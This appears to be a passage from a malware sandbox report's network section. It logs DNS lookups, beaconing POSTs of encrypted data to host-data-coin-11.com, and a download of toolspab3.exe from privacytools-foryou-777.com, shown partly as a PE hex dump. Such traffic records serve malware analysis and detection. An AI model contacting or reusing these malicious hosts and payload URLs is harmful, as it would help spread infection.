Dec 28, 2021 13:54:55.421828985 CET	53	56627	8.8.8.8	192.168.2.4
Dec 28, 2021 13:54:56.162736893 CET	56621	53	192.168.2.4	8.8.8.8
Dec 28, 2021 13:54:56.181586027 CET	53	56621	8.8.8.8	192.168.2.4
Dec 28, 2021 13:54:56.933798075 CET	63116	53	192.168.2.4	8.8.8.8
Dec 28, 2021 13:54:56.952656031 CET	53	63116	8.8.8.8	192.168.2.4
Dec 28, 2021 13:54:57.814192057 CET	64078	53	192.168.2.4	8.8.8.8
Dec 28, 2021 13:54:57.830703974 CET	53	64078	8.8.8.8	192.168.2.4
Dec 28, 2021 13:54:59.701852083 CET	64801	53	192.168.2.4	8.8.8.8
Dec 28, 2021 13:55:00.049293041 CET	53	64801	8.8.8.8	192.168.2.4
Dec 28, 2021 13:56:00.246870995 CET	59172	53	192.168.2.4	8.8.8.8
Dec 28, 2021 13:56:00.569410086 CET	53	59172	8.8.8.8	192.168.2.4
Dec 28, 2021 13:56:01.326704979 CET	62420	53	192.168.2.4	8.8.8.8
Dec 28, 2021 13:56:01.678086996 CET	53	62420	8.8.8.8	192.168.2.4
Dec 28, 2021 13:56:04.660819054 CET	50183	53	192.168.2.4	8.8.8.8
Dec 28, 2021 13:56:04.677397013 CET	53	50183	8.8.8.8	192.168.2.4
Dec 28, 2021 13:56:05.419943094 CET	61531	53	192.168.2.4	8.8.8.8
Dec 28, 2021 13:56:05.796927929 CET	53	61531	8.8.8.8	192.168.2.4
Dec 28, 2021 13:56:06.551572084 CET	49228	53	192.168.2.4	8.8.8.8
Dec 28, 2021 13:56:06.568032026 CET	53	49228	8.8.8.8	192.168.2.4
Dec 28, 2021 13:56:07.308656931 CET	59794	53	192.168.2.4	8.8.8.8
Dec 28, 2021 13:56:07.327295065 CET	53	59794	8.8.8.8	192.168.2.4
Dec 28, 2021 13:56:07.371721983 CET	55916	53	192.168.2.4	8.8.8.8
Dec 28, 2021 13:56:07.388578892 CET	53	55916	8.8.8.8	192.168.2.4
Dec 28, 2021 13:56:08.133531094 CET	52752	53	192.168.2.4	8.8.8.8
Dec 28, 2021 13:56:08.504429102 CET	53	52752	8.8.8.8	192.168.2.4
Dec 28, 2021 13:56:09.252388000 CET	60542	53	192.168.2.4	8.8.8.8
Dec 28, 2021 13:56:09.271675110 CET	53	60542	8.8.8.8	192.168.2.4
Dec 28, 2021 13:56:10.040391922 CET	60689	53	192.168.2.4	8.8.8.8
Dec 28, 2021 13:56:11.048355103 CET	60689	53	192.168.2.4	8.8.8.8
Dec 28, 2021 13:56:12.068723917 CET	53	60689	8.8.8.8	192.168.2.4
Dec 28, 2021 13:56:12.105007887 CET	64206	53	192.168.2.4	8.8.8.8
Dec 28, 2021 13:56:12.122045040 CET	53	64206	8.8.8.8	192.168.2.4
Dec 28, 2021 13:56:13.072597980 CET	53	60689	8.8.8.8	192.168.2.4

ICMP Packets

Timestamp	Source IP	Dest IP	Checksum	Code	Type
Dec 28, 2021 13:56:13.072786093 CET	192.168.2.4	8.8.8.8	cff7	(Port unreachable)	Destination Unreachable

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Dec 28, 2021 13:54:48.219171047 CET	192.168.2.4	8.8.8.8	0xb6c3	Standard query (0)	host-data-coin-11.com	A (IP address)	IN (0x0001)
Dec 28, 2021 13:54:48.989533901 CET	192.168.2.4	8.8.8.8	0x43a2	Standard query (0)	host-data-coin-11.com	A (IP address)	IN (0x0001)
Dec 28, 2021 13:54:49.761595964 CET	192.168.2.4	8.8.8.8	0x2b61	Standard query (0)	host-data-coin-11.com	A (IP address)	IN (0x0001)
Dec 28, 2021 13:54:50.835154057 CET	192.168.2.4	8.8.8.8	0x169	Standard query (0)	host-data-coin-11.com	A (IP address)	IN (0x0001)
Dec 28, 2021 13:54:51.612792015 CET	192.168.2.4	8.8.8.8	0x46a9	Standard query (0)	host-data-coin-11.com	A (IP address)	IN (0x0001)
Dec 28, 2021 13:54:52.366228104 CET	192.168.2.4	8.8.8.8	0xbf6a	Standard query (0)	host-data-coin-11.com	A (IP address)	IN (0x0001)
Dec 28, 2021 13:54:53.156251907 CET	192.168.2.4	8.8.8.8	0xf25f	Standard query (0)	host-data-coin-11.com	A (IP address)	IN (0x0001)
Dec 28, 2021 13:54:55.404691935 CET	192.168.2.4	8.8.8.8	0x218a	Standard query (0)	host-data-coin-11.com	A (IP address)	IN (0x0001)
Dec 28, 2021 13:54:56.162736893 CET	192.168.2.4	8.8.8.8	0x459a	Standard query (0)	host-data-coin-11.com	A (IP address)	IN (0x0001)
Dec 28, 2021 13:54:56.933798075 CET	192.168.2.4	8.8.8.8	0xd74f	Standard query (0)	data-host-coin-8.com	A (IP address)	IN (0x0001)
Dec 28, 2021 13:54:57.814192057 CET	192.168.2.4	8.8.8.8	0x8e2b	Standard query (0)	host-data-coin-11.com	A (IP address)	IN (0x0001)
Dec 28, 2021 13:54:59.701852083 CET	192.168.2.4	8.8.8.8	0xbd60	Standard query (0)	host-data-coin-11.com	A (IP address)	IN (0x0001)
Dec 28, 2021 13:56:00.246870995 CET	192.168.2.4	8.8.8.8	0xbc1a	Standard query (0)	host-data-coin-11.com	A (IP address)	IN (0x0001)
Dec 28, 2021 13:56:01.326704979 CET	192.168.2.4	8.8.8.8	0xbc41	Standard query (0)	privacytools-foryou-777.com	A (IP address)	IN (0x0001)
Dec 28, 2021 13:56:04.660819054 CET	192.168.2.4	8.8.8.8	0xaf15	Standard query (0)	host-data-coin-11.com	A (IP address)	IN (0x0001)
Dec 28, 2021 13:56:05.419943094 CET	192.168.2.4	8.8.8.8	0xd9c9	Standard query (0)	host-data-coin-11.com	A (IP address)	IN (0x0001)
Dec 28, 2021 13:56:06.551572084 CET	192.168.2.4	8.8.8.8	0xe7dc	Standard query (0)	host-data-coin-11.com	A (IP address)	IN (0x0001)
Dec 28, 2021 13:56:07.308656931 CET	192.168.2.4	8.8.8.8	0x936e	Standard query (0)	unicupload.top	A (IP address)	IN (0x0001)
Dec 28, 2021 13:56:07.371721983 CET	192.168.2.4	8.8.8.8	0xce23	Standard query (0)	host-data-coin-11.com	A (IP address)	IN (0x0001)
Dec 28, 2021 13:56:08.133531094 CET	192.168.2.4	8.8.8.8	0xc28f	Standard query (0)	host-data-coin-11.com	A (IP address)	IN (0x0001)
Dec 28, 2021 13:56:09.252388000 CET	192.168.2.4	8.8.8.8	0xa4d1	Standard query (0)	host-data-coin-11.com	A (IP address)	IN (0x0001)
Dec 28, 2021 13:56:10.040391922 CET	192.168.2.4	8.8.8.8	0x9a19	Standard query (0)	infinity-cheats.com	A (IP address)	IN (0x0001)
Dec 28, 2021 13:56:11.048355103 CET	192.168.2.4	8.8.8.8	0x9a19	Standard query (0)	infinity-cheats.com	A (IP address)	IN (0x0001)
Dec 28, 2021 13:56:12.105007887 CET	192.168.2.4	8.8.8.8	0x9d33	Standard query (0)	host-data-coin-11.com	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Dec 28, 2021 13:54:48.238013029 CET	8.8.8.8	192.168.2.4	0xb6c3	No error (0)	host-data-coin-11.com		47.251.11.252	A (IP address)	IN (0x0001)
Dec 28, 2021 13:54:49.006606102 CET	8.8.8.8	192.168.2.4	0x43a2	No error (0)	host-data-coin-11.com		47.251.11.252	A (IP address)	IN (0x0001)
Dec 28, 2021 13:54:50.092185020 CET	8.8.8.8	192.168.2.4	0x2b61	No error (0)	host-data-coin-11.com		47.251.11.252	A (IP address)	IN (0x0001)
Dec 28, 2021 13:54:50.853662968 CET	8.8.8.8	192.168.2.4	0x169	No error (0)	host-data-coin-11.com		47.251.11.252	A (IP address)	IN (0x0001)
Dec 28, 2021 13:54:51.631757021 CET	8.8.8.8	192.168.2.4	0x46a9	No error (0)	host-data-coin-11.com		47.251.11.252	A (IP address)	IN (0x0001)
Dec 28, 2021 13:54:52.385042906 CET	8.8.8.8	192.168.2.4	0xbf6a	No error (0)	host-data-coin-11.com		47.251.11.252	A (IP address)	IN (0x0001)
Dec 28, 2021 13:54:53.443387985 CET	8.8.8.8	192.168.2.4	0xf25f	No error (0)	host-data-coin-11.com		47.251.11.252	A (IP address)	IN (0x0001)
Dec 28, 2021 13:54:55.421828985 CET	8.8.8.8	192.168.2.4	0x218a	No error (0)	host-data-coin-11.com		47.251.11.252	A (IP address)	IN (0x0001)
Dec 28, 2021 13:54:56.181586027 CET	8.8.8.8	192.168.2.4	0x459a	No error (0)	host-data-coin-11.com		47.251.11.252	A (IP address)	IN (0x0001)
Dec 28, 2021 13:54:56.952656031 CET	8.8.8.8	192.168.2.4	0xd74f	No error (0)	data-host-coin-8.com		47.251.11.252	A (IP address)	IN (0x0001)
Dec 28, 2021 13:54:57.830703974 CET	8.8.8.8	192.168.2.4	0x8e2b	No error (0)	host-data-coin-11.com		47.251.11.252	A (IP address)	IN (0x0001)
Dec 28, 2021 13:55:00.049293041 CET	8.8.8.8	192.168.2.4	0xbd60	No error (0)	host-data-coin-11.com		47.251.11.252	A (IP address)	IN (0x0001)
Dec 28, 2021 13:56:00.569410086 CET	8.8.8.8	192.168.2.4	0xbc1a	No error (0)	host-data-coin-11.com		47.251.11.252	A (IP address)	IN (0x0001)
Dec 28, 2021 13:56:01.678086996 CET	8.8.8.8	192.168.2.4	0xbc41	No error (0)	privacytools-foryou-777.com		47.251.11.252	A (IP address)	IN (0x0001)
Dec 28, 2021 13:56:04.677397013 CET	8.8.8.8	192.168.2.4	0xaf15	No error (0)	host-data-coin-11.com		47.251.11.252	A (IP address)	IN (0x0001)
Dec 28, 2021 13:56:05.796927929 CET	8.8.8.8	192.168.2.4	0xd9c9	No error (0)	host-data-coin-11.com		47.251.11.252	A (IP address)	IN (0x0001)
Dec 28, 2021 13:56:06.568032026 CET	8.8.8.8	192.168.2.4	0xe7dc	No error (0)	host-data-coin-11.com		47.251.11.252	A (IP address)	IN (0x0001)
Dec 28, 2021 13:56:07.327295065 CET	8.8.8.8	192.168.2.4	0x936e	No error (0)	unicupload.top		54.38.220.85	A (IP address)	IN (0x0001)
Dec 28, 2021 13:56:07.388578892 CET	8.8.8.8	192.168.2.4	0xce23	No error (0)	host-data-coin-11.com		47.251.11.252	A (IP address)	IN (0x0001)
Dec 28, 2021 13:56:08.504429102 CET	8.8.8.8	192.168.2.4	0xc28f	No error (0)	host-data-coin-11.com		47.251.11.252	A (IP address)	IN (0x0001)
Dec 28, 2021 13:56:09.271675110 CET	8.8.8.8	192.168.2.4	0xa4d1	No error (0)	host-data-coin-11.com		47.251.11.252	A (IP address)	IN (0x0001)
Dec 28, 2021 13:56:12.068723917 CET	8.8.8.8	192.168.2.4	0x9a19	Server failure (2)	infinity-cheats.com	none	none	A (IP address)	IN (0x0001)
Dec 28, 2021 13:56:12.122045040 CET	8.8.8.8	192.168.2.4	0x9d33	No error (0)	host-data-coin-11.com		47.251.11.252	A (IP address)	IN (0x0001)
Dec 28, 2021 13:56:13.072597980 CET	8.8.8.8	192.168.2.4	0x9a19	Server failure (2)	infinity-cheats.com	none	none	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

dbbxvwuoso.com

host-data-coin-11.com

yawyilmlp.com

oabgiwp.net

hwrkvn.net

oskoy.org

yhvtxw.net

kfdyfm.net

jealulibe.org

axnxlm.org

data-host-coin-8.com

mgnuugce.com

kctmodtvj.net

lspsrkslr.org

privacytools-foryou-777.com

clunuonr.net

pebbfc.com

xkoocu.com

unicupload.top

xpkuvjioi.org

nxjfh.org

ithwflphmf.org

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.4	49786	47.251.11.252	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Dec 28, 2021 13:54:48.415672064 CET	1534	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://dbbxvwuoso.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 148 Host: host-data-coin-11.com
Dec 28, 2021 13:54:48.415689945 CET	1534	OUT	Data Raw: 10 87 f1 99 1a 85 d0 c7 b8 4e 7a 31 0c c2 97 8e 40 14 d9 44 a0 36 1d 9e c3 e7 de f1 fe a6 92 83 1d c7 59 a6 1f 69 cd e2 ea de f3 dd d0 80 11 1f 77 e5 14 88 d5 da fe b7 dc 6d bd d2 e4 d8 44 d4 75 24 f3 c4 86 de 9e 66 5d 02 c9 a1 c1 64 23 c0 aa 3a Data Ascii: Nz1@D6YiwmDu$f]d#:D*op xU?n-pdHr1ap.)$Q?t+mUGc[^P"K
Dec 28, 2021 13:54:48.974246025 CET	1534	IN	HTTP/1.1 404 Not Found Server: nginx/1.20.1 Date: Tue, 28 Dec 2021 12:54:48 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Data Raw: 31 39 0d 0a 14 00 00 00 7b fa f7 1b b5 69 2b 2c 47 fa 0e a8 c1 82 9f 4f 1a c4 da 16 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 19{i+,GO0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.4	49787	47.251.11.252	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Dec 28, 2021 13:54:49.189124107 CET	1535	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://yawyilmlp.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 213 Host: host-data-coin-11.com
Dec 28, 2021 13:54:49.189142942 CET	1535	OUT	Data Raw: 10 87 f1 99 1a 85 d0 c7 b8 4e 7a 31 0c c2 97 8e 40 14 d9 44 a0 36 1d 9e c3 e7 de f1 fe a6 92 83 1d c7 59 a6 1f 69 cd e2 ea de f3 dd d0 80 11 1f 77 e5 14 88 d5 da fe b7 dc 6d bd d2 e4 d8 44 d4 75 24 f3 c4 85 de 9e 66 5d 02 c8 a1 c1 64 45 84 9f 63 Data Ascii: Nz1@D6YiwmDu$f]dEcHo1MCB'm'g#flH\|XG=(r2)9*W8nt'3m_h+3GR'vD~BNNkKz30Ox
Dec 28, 2021 13:54:49.753453970 CET	1536	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Tue, 28 Dec 2021 12:54:49 GMT Content-Type: text/html; charset=utf-8 Content-Length: 0 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
10	192.168.2.4	49798	47.251.11.252	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Dec 28, 2021 13:54:58.363480091 CET	1560	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://mgnuugce.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 143 Host: host-data-coin-11.com
Dec 28, 2021 13:54:58.363509893 CET	1560	OUT	Data Raw: 10 87 f1 99 1a 85 d0 c7 b8 4e 7a 31 0c c2 97 8e 40 14 d9 44 a0 36 1d 9e c3 e7 de f1 fe a6 92 83 1d c7 59 a6 1f 69 cd e2 ea de f3 dd d0 80 11 1f 77 e5 14 88 d5 da fe b7 dc 6d bd d2 e4 d8 44 d4 75 24 f3 c4 85 de 96 66 5d 02 c8 a1 c1 64 42 9c c7 69 Data Ascii: Nz1@D6YiwmDu$f]dBi>J~#gBTgTK~}bbk6$R647AdH
Dec 28, 2021 13:54:58.914283037 CET	1560	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Tue, 28 Dec 2021 12:54:58 GMT Content-Type: text/html; charset=utf-8 Content-Length: 0 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
11	192.168.2.4	49799	47.251.11.252	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Dec 28, 2021 13:55:00.231923103 CET	1561	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://kctmodtvj.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 246 Host: host-data-coin-11.com
Dec 28, 2021 13:55:00.231942892 CET	1561	OUT	Data Raw: 10 87 f1 99 1a 85 d0 c7 b8 4e 7a 31 0c c2 97 8e 40 14 d9 44 a0 36 1d 9e c3 e7 de f1 fe a6 92 83 1d c7 59 a6 1f 69 cd e2 ea de f3 dd d0 80 11 1f 77 e5 14 88 d5 da fe b7 dc 6d bd d2 e4 d8 44 d4 75 24 f3 c4 85 de 97 66 5d 02 c8 a1 c1 64 23 9c b0 18 Data Ascii: Nz1@D6YiwmDu$f]d#=IuB9c{8^"oq["?&o9p\K%7U'./2(ZBs6p<]7x\|~ VcCrf5)fIQ6dgH#mx!
Dec 28, 2021 13:55:00.794028044 CET	1562	IN	HTTP/1.1 404 Not Found Server: nginx/1.20.1 Date: Tue, 28 Dec 2021 12:55:00 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Data Raw: 33 37 0d 0a 02 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e d6 1e 52 25 40 a3 f5 c2 ea fb 5f f5 4d 8b 2d e4 04 08 c7 5c a5 ba 7a ae 2e 54 0a e3 f0 d8 4b fc 05 d4 43 0d 0a 30 0d 0a 0d 0a Data Ascii: 37I:82OR%@_M-\z.TKC0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
12	192.168.2.4	49844	47.251.11.252	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Dec 28, 2021 13:56:00.745909929 CET	10446	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://lspsrkslr.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 269 Host: host-data-coin-11.com
Dec 28, 2021 13:56:00.745946884 CET	10446	OUT	Data Raw: 10 87 f1 99 1a 85 d0 c7 b8 4e 7a 31 0c c2 97 8e 40 14 d9 44 a0 36 1d 9e c3 e7 de f1 fe a6 92 83 1d c7 59 a6 1f 69 cd e2 ea de f3 dd d0 80 11 1f 77 e5 14 88 d5 da fe b7 dc 6d bd d2 e4 d8 44 d4 75 24 f3 c4 85 de 94 66 5d 02 c8 a1 c1 64 07 dd dc 61 Data Ascii: Nz1@D6YiwmDu$f]da7u?cSop;YKhcJI$?!s\Ba5uP"s&a7>(DwN.8Nk4oZ}!\/FGA3vO'_H7+"A/dbK:
Dec 28, 2021 13:56:01.319165945 CET	10447	IN	HTTP/1.1 404 Not Found Server: nginx/1.20.1 Date: Tue, 28 Dec 2021 12:56:01 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Data Raw: 34 36 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f d1 95 4f 11 6a 11 e9 b2 83 bd a6 02 e9 1a d1 70 ae 59 4a d9 52 a6 be 67 e3 25 58 51 b8 f6 cb 41 e1 0e 88 16 95 e1 63 da 7d b3 ef d2 01 79 e5 a8 1d 63 a9 0d 0a 30 0d 0a 0d 0a Data Ascii: 46I:82OOjpYJRg%XQAc}yc0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
13	192.168.2.4	49845	47.251.11.252	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Dec 28, 2021 13:56:01.860596895 CET	10447	OUT	GET /downloads/toolspab3.exe HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Host: privacytools-foryou-777.com
Dec 28, 2021 13:56:02.409576893 CET	10454	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Tue, 28 Dec 2021 12:56:02 GMT Content-Type: application/x-msdos-program Content-Length: 339456 Connection: close Last-Modified: Tue, 28 Dec 2021 12:56:02 GMT ETag: W/"52e00-5d43457ecb7e9" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 04 b7 bc 92 40 d6 d2 c1 40 d6 d2 c1 40 d6 d2 c1 2f a0 4c c1 51 d6 d2 c1 2f a0 78 c1 2a d6 d2 c1 49 ae 41 c1 43 d6 d2 c1 40 d6 d3 c1 fd d6 d2 c1 2f a0 79 c1 76 d6 d2 c1 2f a0 48 c1 41 d6 d2 c1 2f a0 4f c1 41 d6 d2 c1 52 69 63 68 40 d6 d2 c1 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 1b b4 65 60 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 ee 03 00 00 20 09 00 00 00 00 00 b0 3d 02 00 00 10 00 00 00 00 04 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 40 0d 00 00 04 00 00 93 13 06 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 cc eb 03 00 28 00 00 00 00 90 0c 00 88 62 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0d 00 24 21 00 00 70 13 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 a5 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 e8 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 4e ed 03 00 00 10 00 00 00 ee 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 68 6f 08 00 00 00 04 00 00 8c 00 00 00 f2 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 65 6a 65 76 75 00 05 00 00 00 00 70 0c 00 00 02 00 00 00 7e 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 64 6f 7a 69 00 00 00 93 0d 00 00 00 80 0c 00 00 0e 00 00 00 80 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 88 62 00 00 00 90 0c 00 00 64 00 00 00 8e 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ee 3b 00 00 00 00 0d 00 00 3c 00 00 00 f2 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 dc ee 03 00 f8 ee 03 00 0c ef 03 00 1e ef 03 00 30 ef 03 00 46 ef 03 00 56 ef 03 00 6c ef 03 00 7c ef 03 00 98 ef 03 00 ac ef 03 00 c0 ef 03 00 d6 ef 03 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$@@@/LQ/x*IAC@/yv/HA/OARich@PELe` =@@(b$!p@.textN `.dataho@.pejevup~@.dozi@.rsrcbd@@.reloc;<@B0FVl\|
Dec 28, 2021 13:56:02.409607887 CET	10455	IN	Data Raw: 00 f0 ef 03 00 0a f0 03 00 22 f0 03 00 36 f0 03 00 42 f0 03 00 50 f0 03 00 68 f0 03 00 8a f0 03 00 96 f0 03 00 a6 f0 03 00 c2 f0 03 00 de f0 03 00 f0 f0 03 00 00 f1 03 00 0e f1 03 00 16 f1 03 00 24 f1 03 00 30 f1 03 00 42 f1 03 00 58 f1 03 00 66 Data Ascii: "6BPh$0BXfv 8Tdx>Rhx4B\p
Dec 28, 2021 13:56:02.409631014 CET	10457	IN	Data Raw: 00 75 00 62 00 69 00 77 00 75 00 68 00 61 00 6e 00 69 00 76 00 69 00 6d 00 00 00 4b 69 62 20 72 65 76 6f 6d 75 76 75 66 69 62 6f 20 6d 69 79 69 66 20 79 75 66 6f 62 65 68 00 00 53 75 67 6f 66 69 63 61 6c 61 6c 75 6a 20 74 75 70 65 6d 69 63 6f 62 Data Ascii: ubiwuhanivimKib revomuvufibo miyif yufobehSugoficalaluj tupemicobaTog bemal zumesuyamop zemim xuzaxaruroluZumohodove linucasuxadefi dunixoxehevavohupezigisilegurazemalugisif
Dec 28, 2021 13:56:02.409651995 CET	10458	IN	Data Raw: 78 69 6f 73 62 61 73 65 00 43 3a 5c 50 72 6f 67 72 61 6d 20 46 69 6c 65 73 20 28 78 38 36 29 5c 4d 69 63 72 6f 73 6f 66 74 20 56 69 73 75 61 6c 20 53 74 75 64 69 6f 20 31 30 2e 30 5c 56 43 5c 69 6e 63 6c 75 64 65 5c 73 74 72 65 61 6d 62 75 66 00 Data Ascii: xiosbaseC:\Program Files (x86)\Microsoft Visual Studio 10.0\VC\include\streambuf$@AzAAAAAAAAAYA\|AAAAbad locale nameC:\Program Files (x86)\Microsoft Visual Studio 10.0\VC\include\xlocaleC
Dec 28, 2021 13:56:02.409673929 CET	10460	IN	Data Raw: 00 29 00 00 00 00 00 43 6c 69 65 6e 74 00 00 49 67 6e 6f 72 65 00 00 43 52 54 00 4e 6f 72 6d 61 6c 00 00 46 72 65 65 00 00 00 00 04 20 40 00 fc 1f 40 00 f8 1f 40 00 f0 1f 40 00 e8 1f 40 00 45 72 72 6f 72 3a 20 6d 65 6d 6f 72 79 20 61 6c 6c 6f 63 Data Ascii: )ClientIgnoreCRTNormalFree @@@@@Error: memory allocation: bad memory block type.Invalid allocation size: %Iu bytes.%sClient hook allocation failure.Client hook allocation failure at file %hs line
Dec 28, 2021 13:56:02.409696102 CET	10461	IN	Data Raw: 00 20 00 3d 00 3d 00 20 00 6e 00 42 00 6c 00 6f 00 63 00 6b 00 55 00 73 00 65 00 00 00 70 00 48 00 65 00 61 00 64 00 2d 00 3e 00 6e 00 4c 00 69 00 6e 00 65 00 20 00 3d 00 3d 00 20 00 49 00 47 00 4e 00 4f 00 52 00 45 00 5f 00 4c 00 49 00 4e 00 45 Data Ascii: == nBlockUsepHead->nLine == IGNORE_LINE && pHead->lRequest == IGNORE_REQHEAP CORRUPTION DETECTED: after %hs block (#%d) at 0x%p.CRT detected that the applica
Dec 28, 2021 13:56:02.409717083 CET	10462	IN	Data Raw: 73 20 77 69 74 68 20 75 6e 6b 6e 6f 77 6e 20 72 65 74 75 72 6e 20 76 61 6c 75 65 21 0a 00 00 5f 68 65 61 70 63 68 6b 20 66 61 69 6c 73 20 77 69 74 68 20 5f 48 45 41 50 42 41 44 50 54 52 2e 0a 00 00 00 5f 68 65 61 70 63 68 6b 20 66 61 69 6c 73 20 Data Ascii: s with unknown return value!_heapchk fails with _HEAPBADPTR._heapchk fails with _HEAPBADEND._heapchk fails with _HEAPBADNODE._heapchk fails with _HEAPBADBEGIN._CrtSetDbgFlag(fNewBits==_CRTD
Dec 28, 2021 13:56:02.409744024 CET	10464	IN	Data Raw: 00 22 00 2c 00 20 00 30 00 29 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: ", 0)
